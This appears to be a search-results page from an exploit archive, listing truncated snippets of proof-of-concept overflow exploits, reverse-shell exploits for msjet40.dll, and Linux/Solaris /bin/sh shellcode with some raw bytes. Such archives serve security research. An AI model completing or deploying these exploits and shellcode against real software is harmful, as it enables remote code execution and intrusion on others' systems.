298 matches found
WinAsm Studio 5.1.5.0 Local Heap Overflow PoC
Exploit for unknown platform in category dos / poc ============================================= WinAsm Studio 5.1.5.0 Local Heap Overflow PoC ============================================= WinAsm Studio 5.1.5.0 Local Heap Overflow Poc By Mountassif Moad D0wnload :...
Linux/x86 - execve("/bin//sh/",["/bin//sh"],NULL)
No description provided by source. / revenge-execve.c, v1.0 2006/10/14 16:32 Yet another linux execve shellcode.. linux/x86 execve"/bin//sh/","/bin//sh",NULL shellcode http://www.0xcafebabe.it [email protected] But this time it's 22 bytes We could start the shellcode with a mov instead of pus...
FTPShell Server 4.3 (licence key) Remote Buffer Overflow PoC
No description provided by source. !/usr/bin/perl Title: FTPShell Server 4.3 licence key Remote Buffer Overflow PoC Summary: FTPShell server is a windows FTP service that enables remote file downloads and uploads. It supports regular and secure FTP based on both SSL/TLS and SSH2. It is also...
Amaya Web Editor 11.0 - Remote Buffer Overflow (PoC)
!/usr/bin/perl -w Amaya Web Editor "."\n". ''."\n". "Heap"."\n". ""; my $file="St.html"; $exploit = $code.$bof.$bof2.$bof3.$coding; openmy $FILE, "$file" or die "Cannot open $file: $!"; print $FILE $exploit ; close$FILE; print "$file has been created \n"; milw0rm.com 2009-01-29...
Solaris/x86 - execve(/bin/sh) Shellcode (43 bytes)
Solaris/x86 - execve/bin/sh Shellcode 43 bytes. Shellcode exploit for Solarisx86 platform / Solaris shellcode - execve /bin/sh / include // http://www.shellcode.com.ar // // execve//bin/sh char shellcode= "\xb8\xff\xf8\xff\x3c" // mov eax, 03cfff8ffh "\xf7\xd0" // not eax "\x50" // push eax...
VeryPDF PDFView - OCX ActiveX OpenPDF Heap Overflow (PoC)
Sub Boom buff = String1006, "A" target.OpenPDF buff, 1, 1 End Sub milw0rm.com 2008-11-15...
mIRC 6.34 Remote Buffer Overflow PoC
No description provided by source. Mirc 6.34 Remote Buffer Overflow This poc allow you to own the 2 first EDI & EDX bytes. To become remote, add a simple document.location.href=irc://server.com/... in some html page use IO::Socket; sub sock my $sock=new IO::Socket::INET Listen = 1, LocalAddr =...
mIRC 6.34 Remote Buffer Overflow PoC
Exploit for unknown platform in category dos / poc ==================================== mIRC 6.34 Remote Buffer Overflow PoC ==================================== Mirc 6.34 Remote Buffer Overflow This poc allow you to own the 2 first EDI & EDX bytes. To become remote, add a simple...
MS Jet Database (msjet40.dll) Reverse Shell Exploit
No description provided by source. See-security Technologies ltd. http://www.see-security.com Microsoft Jet msjet40.dll Reverse Shell Exploit coded by Tal zeltzer Based on the exploit written by S.Pearson import sys import struct Addresses are compatible with Windows XP Service Pack 1 ReturnAddre...
SubEdit Player build 4066 - subtitle Buffer Overflow (PoC)
SubEdit Player build 4066 - subtitle Buffer Overflow PoC /===Subedit Player build 4066 subtitle BoF vulnerability=========| | | SubEdit Player is a very popular player and subtitles | editor in Poland. It does not perform any boundery checks | on supplied subtitles. This causes buffer overrun and...
CA BrightStor ARCserve Backup r11.5 ActiveX Remote BOF Exploit 0day
No description provided by source. HTML !-- CA BrightStor ARCserve Backup r11.5 AddColumn 0day ActiveX Remote Buffer Overflow Exploit Bug discovered by Krystian Kloskowski h07 [email protected] Tested on: - CA BrightStor ARCserve Backup r11.5 ftp://ftp.ca.com/priv/trial/BABr11/BABLDr115/BABLDr115.zi...
PHP 5.2.3 php_ntuser ntuser_getuserlist() Local Buffer Overflow PoC
No description provided by source. ?php //PHP 5.2.3 phpntuser ntusergetuserlist Local Buffer Overflow //author: shinnai //mail: shinnaiatautisticidotorg //site: http://shinnai.altervista.org //greetz to BrainBugger Crew //http://www.brainbugger.altervista.org/ //Bug discovered with "Footzo" thank...
phpget-overflow.txt
...
Dev-C++ 4.9.9.2 CPP File Parsing Local Stack Overflow PoC
Exploit for unknown platform in category dos / poc ========================================================= Dev-C++ 4.9.9.2 CPP File Parsing Local Stack Overflow PoC ========================================================= !/usr/bin/env python print...
linux/x86 - execve/bin/sh 22 bytes
linux/x86 execve/bin/sh 22 bytes. Shellcode exploit for linx86 platform / revenge-execve.c, v1.0 2006/10/14 16:32 Yet another linux execve shellcode.. linux/x86 execve"/bin//sh/","/bin//sh",NULL shellcode http://www.0xcafebabe.it But this time it's 22 bytes We could start the shellcode with a mov...
linux/x86 quick (yet conditional, eax != 0 and edx == 0) exit 4 bytes
Exploit for linux/x86 platform in category shellcode ===================================================================== linux/x86 quick yet conditional, eax != 0 and edx == 0 exit 4 bytes ===================================================================== / linux/x86 quick yet conditional, e...
linux/x86 /bin/sh sysenter Opcode Array Payload 45 bytes
Exploit for linux/x86 platform in category shellcode ======================================================== linux/x86 /bin/sh sysenter Opcode Array Payload 45 bytes ======================================================== / lnxbinsh2.c - v1 - 45 Byte /bin/sh sysenter Opcode Array Payload...
Microsoft Jet Database - 'msjet40.dll' Code Execution (Reverse Shell) (2)
Microsoft Jet msjet40.dll Reverse Shell Exploit Based on the exploit written by S.Pearson and Python version by coded by Tal zeltzer XP/sp2 fixed version by Jean Luc import sys import struct Addresses are compatible with Windows XP Service Pack 1 and Service Pack 2 EIP = "\x47\xAD\x05\x30"; Use...